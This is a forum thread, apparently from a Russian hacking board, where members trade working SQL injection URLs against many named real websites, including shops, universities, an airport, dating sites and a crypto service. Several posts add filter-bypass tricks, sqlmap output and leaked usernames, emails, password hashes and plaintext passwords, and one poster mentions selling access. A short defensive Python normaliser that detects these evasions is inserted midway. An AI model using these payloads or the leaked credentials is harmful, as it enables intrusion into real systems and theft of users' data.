SQL Injections

Discussion in 'Vulnerabilities' started by yarbabin, 27 Apr 2015.

  1. powerOfthemind (New Member; joined 31 Jul 2015; messages: 41; likes received: 4; reputations: 1)


    The hash looks very much like OpenBSD Blowfish.
    I suspect the login will be Admin.
    Here is what I managed to pull out; I suspect someone has already gotten into the admin panel :)
    [email protected]:$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO!
    [email protected]:$2y$10$.qPZfqEzdniT1gOnrmQGWeZ9ZRikV1ic4aFrCmRUCWFk4u9wVBkqC!
    Here is what I found about this type of hash; I didn't understand any of it, but maybe it will be useful to someone: http://habrahabr.ru/post/211645/

    Code:
    http://dir.rusmedserv.com/index.php?t=sub_pages&cat=-4+UNION+SELECT+1,2,user(),4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
    And a bonus :) Here is an interesting inject. I can't get any further in; if you have ideas, PM me please.
     
    #41 powerOfthemind, 31 Jul 2015
    Last edited by a moderator: 31 Jul 2015
    goot likes this.
  2. K1nD[e]R (Banned; joined 16 Jun 2007; messages: 159; likes received: 127; reputations: 0)

    btc

    Code:
    Post[URL]: http://www.vitalcoin.com/order_ajax_request.php
    Post[data]: Action=IsUserLogedIn&TransactionMode=2&TransactionType=PKR and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
    
    Code:
    <b>Warning</b>:  mysql_query(): Unable to save result set in <b>/home/vitalcoi/public_html/models/order.php</b> on line <b>88</b><br />
    Duplicate entry '~'vitalcoi_dbuser@localhost'~1' for key 'group_key'
    Code:
    The admin panel is behind Basic auth
    UserID,UserName,Password=16^kitharass^56c87d0571ee5a4da6793583164da8f4:[email protected]
    UserID,UserName,Password=14^admin^Vital!@#:[email protected]
    UserID,UserName,Password=15^maria^55913d077666fa9d9b5a0a35c718ba38
    
     
    mefish2 likes this.
  3. Mister_Bert0ni (Reservists Of Antichat; joined 10 May 2015; messages: 142; likes received: 190; reputations: 57)

    Code:
    www.meleeboys.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'<br>',password),222+from+jos_users--%20-
    www.skala-club.vn.ua/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'<br>',password),222+from+jos_users--%20-
    toxic.h5n1.free.fr/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'<br>',password),222+from+jos_users--%20-
    
     
  4. spherics (Elder; joined 14 Jan 2008; messages: 190; likes received: 162; reputations: 25)

    Code:
     http://casu.us/online_programs.php?id=-1+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5-- 
    5.0.96-log
    [email protected]
    casuni

    Powered By: Friends IT Solution (all of them are full of holes)
    I'm trying to take them apart themselves.
     
    KIR@PRO likes this.
  5. Unknowhacker (Member; joined 25 May 2013; messages: 254; likes received: 35; reputations: 24)

    The NORTH FACE
    Code:
    http://north-face.com.ua/search/?searh=%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27
    Version: 5.5.42-37.1
     
    psihoz26 likes this.
  6. grimnir (Members of Antichat; joined 23 Apr 2012; messages: 1,114; likes received: 830; reputations: 231)

    www.nowinstock.net, traffic 580k
    Code:
    Parameter: #1* (URI)
        Type: boolean-based blind
        Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 RLIKE (SELECT (CASE WHEN (2936=2936) THEN 1 ELSE 0x28 END))
    
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
        Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 AND EXTRACTVALUE(4360,CONCAT(0x5c,0x71786a6a71,(SELECT (ELT(4360=4360,1))),0x71626a7071))
    ---
    web application technology: Apache
    back-end DBMS: MySQL 5.1
    Database: sdfs4f_main
     
    spherics likes this.
  7. powerOfthemind (New Member; joined 31 Jul 2015; messages: 41; likes received: 4; reputations: 1)

    Code:
    http://www.pourmaplanete.com/news/novel.php?ID=-151+UNION SELECT 1,user(),version(),4,5,6,7,8,9,10,database(),12,13--
    http://www.tovary2.ru/a-general.php?id_gorod=-74+UNION SELECT 1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,16,17,database(),19,20,21,22,23,24,25,26,27,28--
    http://velostar.ru/guest.php?active_page=-1500+union+select+1,2,3,4,5,version(),7,8--
    Output is in the title
    
     
    #47 powerOfthemind, 8 Aug 2015
    Last edited: 16 Aug 2015
  8. grimnir (Members of Antichat; joined 23 Apr 2012; messages: 1,114; likes received: 830; reputations: 231)

    papersource.com, traffic 430k
    Code:
    Parameter: #1* (URI)
    
        Type: boolean-based blind
        Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' RLIKE (SELECT (CASE WHEN (4297=4297) THEN 1 ELSE 0x28 END)) AND 'DiTO'='DiTO.html
    
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
        Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' AND EXTRACTVALUE(1565,CONCAT(0x5c,0x71626a6b71,(SELECT (ELT(1565=1565,1))),0x716a787871)) AND 'DncI'='DncI.html
    back-end DBMS: MySQL >= 5.0.0
    databases:

    paper
     
  9. WallHack (Elder; joined 18 Jul 2013; messages: 306; likes received: 138; reputations: 33)

    Code:
    http://testmat.ru/mat_test.php?id=-2+union+select+1,2,3,4,user,password,7,8,9,10,11,12+from+users+--+

    Code:
    http://www.yarohranatruda.ru/order.php?id=-377%27+union+select+1,admin_name,admin_passwd,4,5+FrOm+admin+--+
    Admin panel
    Code:
    http://www.yarohranatruda.ru/admin/
    Code:
    http://russkayabronza.com/1/order.php?id=-866'+union+select+1,2,3,4,5,6,7,8,9+--+
    Admin panel
    Code:
    http://russkayabronza.com/adm.php
     
    #49 WallHack, 25 Aug 2015
    Last edited: 25 Aug 2015
    erbolg likes this.
  10. Muracha (Member; joined 30 Jul 2011; messages: 153; likes received: 10; reputations: 0)

    Code:
    http://koreamed.org/JournalVolume.php?id=-200+union+select+user%28%29--
    used together with sqlmap
    [*] information_schema
    [*] KoreaMed
    [*] test

    A hellish number of tables; I didn't bother messing with it.

    Code:
    http://www.findfilehost.com/filehost.php?id=-2+UNION%20+select%20+%20%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
    mod_secure cuts it off

    Code:
    http://www.jamrid.com/RiddimDetail.php?ID=-1677+union+select+1,convert%28concat_ws%280x3a3a,version%28%29,user%28%29,database%28%29%29+using+latin1%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
    
    There is an encoding problem: the output is wrong and version() cannot simply be printed. You need to use the convert() function
    convert(version()+using+latin1)
    in the end we get:

    4.1.14::soundman@localhost::RiddimDB
     
  11. WallHack (Elder; joined 18 Jul 2013; messages: 306; likes received: 138; reputations: 33)

    Code:
    http://toefilm.ru/view_post.php?id=-32%27+union+select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15+--+
     
  12. Га-Ноцри (Elder; joined 16 Oct 2011; messages: 329; likes received: 177; reputations: 76)

    An airport, apparently not the smallest one in that Europe of yours. There is a filter; it is bypassed by inserting %0B into any part, for example union -> uni%0Bin, information_schema.tables -> infor%0Bmation_schema.tables, and so on by analogy.

    TCI == 110, PR == 6, Alexa == 120,422

    Code:
    http://www.koeln-bonn-airport.de/index.php?id=147&L=0&q=1'or(extractvalue(rand(),concat(0x3a,(Sel%0BeCt(concat_ws(0x3a,version(),user()))))))='1
    Online booking of air tickets and everything related to it. Output is in the page source

    TCI == 10, PR == 0, Alexa == 390,710

    Code:
    http://www.parkrideflyusa.com/booking-details?id=-31 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x03a,version(),database(),user())--
     
    #52 Га-Ноцри, 15 Sep 2015
    Last edited by a moderator: 16 Sep 2015
    grimnir likes this.
  13. ButilkaSoka (Member; joined 4 Jun 2015; messages: 22; likes received: 12; reputations: 0)

    Seems like a lot of overall traffic, 2.7kk; a subdomain of pmi.org
    Code:
    http://learning.pmi.org/course-detail.php?id=-3582+union+select+all+1,concat(user(),0x3a,database(),0x3c62723e,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+limit+0,1--
    [email protected]: pmiprof
    5.0.96-log


    console games
    Code:
    https://www.playonrent.com/gameDetails.php?id=137 and (select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
    Duplicate entry '[email protected]' for key 'group_key'
    5.1.69-community-log


    WAF
    Code:
    http://www.e-wigs.com/wigs.php?id=-1773 UNION SELECT 1,2,3,4,5,concat(user(),0x3a,database(),0x3c62723e,version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27  limit 0,1
    Here is the bypass
    Code:
    http://www.e-wigs.com/wigs.php?id=-1773/*!union*//*!12345%73%65%6c%65%63%74*/1,2,3,4,5,concat%28user%28%29%2C0x3a%2Cdatabase%28%29%2C0x3c62723e%2Cversion%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns  where TABLE_schema=database%28%29 limit 0,1
    [email protected]:db472536571
    5.1.73-log


    Code:
    http://www.fckhimki.ru/modules/players/index_d.php?current_id=15&player_id=-111+union+select+1,2,3,4,version(),6,7,8,9,10 -- 
    5.0.90-log
     
    #53 ButilkaSoka, 20 Sep 2015
    Last edited: 24 Sep 2015
    grimnir likes this.
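A defender-side normaliser for the two evasions discussed in this post and the previous one (%0B spliced into keywords, and keywords wrapped in /*!ddddd ... */ versioned comments or percent-encoded), written here as an added example that is not code from the thread: it undoes those layers before any rule matching, which is what a WAF or log-review script has to do for keyword rules to mean anything. The sample requests are constructed to mirror the thread's patterns; the thread does not say why %0B gets through the target's filter, so the code simply deletes control bytes, which no legitimate parameter carries.

```python
import re
from urllib.parse import unquote_plus

# Constructed request lines modelled on the patterns in this thread (not real
# traffic). The first three use the evasions discussed above; the last two are
# benign and must not be flagged.
SAMPLE_REQUESTS = [
    "index.php?id=147&q=1'or(extractvalue(rand(),concat(0x3a,(Sel%0BeCt(version())))))='1",
    "wigs.php?id=-1773/*!union*//*!12345%73%65%6c%65%63%74*/1,2,3+from+infor%0Bmation_schema.columns",
    "product.php?id=-70'+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,version(),3",
    "search.php?q=union+station+select+seats",
    "gameDetails.php?id=137",
]

# Each rule requires SQL *shape* after normalisation, not just a keyword,
# so ordinary text such as "union station" does not fire.
RULES = [
    ("union-select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("xml-error-based", re.compile(r"\b(?:extractvalue|updatexml)\s*\(")),
    ("information-schema", re.compile(r"\binformation_schema\.\w+")),
    ("rand-groupby", re.compile(r"\bfloor\s*\(\s*rand\s*\(")),
]

def normalize(raw: str) -> str:
    """Undo the layers an evasion adds before any keyword matching is done."""
    s = raw
    for _ in range(3):                      # peel repeated percent-encoding
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    # /*!50000UnIoN*/ is executed by MySQL as plain UnIoN: keep the body.
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)    # ordinary comments vanish
    # Control bytes such as \x0B never belong in a legitimate parameter;
    # delete them so a split keyword ("infor\x0Bmation") is reassembled.
    s = re.sub(r"[\x00-\x08\x0b\x0c\x0e-\x1f]", "", s)
    s = re.sub(r"\s+", " ", s)                       # tabs/newlines -> one space
    return s.lower()

def classify(raw: str) -> list:
    """Return the names of all rules that fire on the normalised request."""
    text = normalize(raw)
    return [name for name, rx in RULES if rx.search(text)]

def scan(requests):
    """Map each suspicious request to its rule hits; benign lines are omitted."""
    return {r: hits for r in requests if (hits := classify(r))}
```

Running scan(SAMPLE_REQUESTS) flags exactly the first three lines; the point is that the same rules applied to the raw, un-normalised strings would miss all three.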
  14. 3nvY (Elder; joined 8 Jun 2015; messages: 51; likes received: 21; reputations: 11)

    Code:
    http://www.season.ru/forum/profile.php?f=5&id=-1556%27+union+select+1,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14--+
     
  15. DezMond™ (Elder; joined 10 Jan 2008; messages: 3,619; likes received: 432; reputations: 234)

    Code:
    https://www.htw-dresden.de/index.php?id=9147&vid=239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
     
  16. st1x0 (Member; joined 23 May 2015; messages: 9; likes received: 5; reputations: 1)

    This was a warm-up; I thought it would do for selling, but I think they're small fry... maybe it will be useful to someone or to traffers.
    Code:
    ttp://torrent.tlt.ru/browse.php?cat=5
    web server operating system: Linux Ubuntu
    web application technology: PHP 5.3.2, Nginx
    back-end DBMS: MySQL 5.0
    available databases [2]:
    [*] information_schema
    [*] tracker
    Code:
    mega-torrent.ru/browse.php?cat=18
    Warning: mysql_fetch_array() expects parameter 1 to be resource
    Code:
    http://www.guildvalhall.eu/inc-news.php?id=8429
    web application technology: Apache
    back-end DBMS: MySQL 5.0.12
    available databases [2]:
    [*] information_schema
    [*] valhall
    Lots of info. :)
     
    Ruslan1993it and Roger96 like this.
  17. WallHack (Elder; joined 18 Jul 2013; messages: 306; likes received: 138; reputations: 33)

    Code:
    http://xn--h1acbqf.xn--e1apq.xn--p1ai/view_dokum.php?id=-37%27+union+select+1,@@version,3,4,5,6,7,8,9,10+--+
     
    palec2006 likes this.
  18. WallHack (Elder; joined 18 Jul 2013; messages: 306; likes received: 138; reputations: 33)

    A foreign dating site
    Code:
    http://staynaughty.com/wall.php?uid=442%20and%20(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
    An anonymous dating and debauchery site...
    Code:
    https://sexintime.at/wall.php?uid=101899%20%20and%20(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
     
    #58 WallHack, 13 Oct 2015
    Last edited: 13 Oct 2015
  19. ButilkaSoka (Member; joined 4 Jun 2015; messages: 22; likes received: 12; reputations: 0)

    Output is in the title or in the page source
    Code:
    http://www.uaces.org/events/calendar/event.php?id=1 /*!50000UnION*/ SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- 
    5.5.42-cll

    Twins sports equipment
    Output is in the title or in the page source
    Code:
    http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,version(),26,27,28,29 or ''='
    twinsspe_twins@localhost
    5.5.36-cll
    twinsspe_twins

    Shop
    Code:
    http://www.patersonphotographic.com/category.php?categoryID=1 and extractvalue(null,concat(0x3a,(select concat_ws(0x3c62723e,user(),version()))))
    plummo@localhost
    5.1.73
    plummo_shop


    Code:
    http://www.dfki.de/lt/card.php?id=-185 and 1=1 UNION SELECT 1,user(),version(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30  --
    staff_user@lnv-101
    4.0.21-Max
    staff

    Code:
    http://www.ghasham.com/products-category.php?id=-6 /*!50000and 1=1*/ /*!50000uNIoN*/%09/*!50000seLEC%74*/%091,2,/*!50000unhex(hex(coNcat_ws(0x3a,user(),version(),database())))*/,4,5,6,7,8,9,10,11,12,13 -- 
    ghashamo_user@localhost
    5.5.42-37.1
    ghashamo_db

    Shop
    Code:
    http://www.mcfarlandbooks.com/book-2.php?id=-978-0-7864-7807-1'+/*!50000UnIoN*/+all+/*!50000SeLeCt*/+1,2,/*!50000coNcat_ws(0x3c62723e,user(),version(),database())*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+--+and '1'='1
    mcbooks_dbuser@localhost
    5.5.42-37.1
    mcbooks_mainsite
     
    #59 ButilkaSoka, 17 Oct 2015
    Last edited: 18 Oct 2015
  20. DezMond™ (Elder; joined 10 Jan 2008; messages: 3,619; likes received: 432; reputations: 234)

    Code:
    http://www.industrie4-summit.de/soap/showProgramDetails.php?eventId=45&language=de&opener=/programm.html&id=27121+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+from+information_schema.tables+--+
    5.5.44-0+deb7u1-log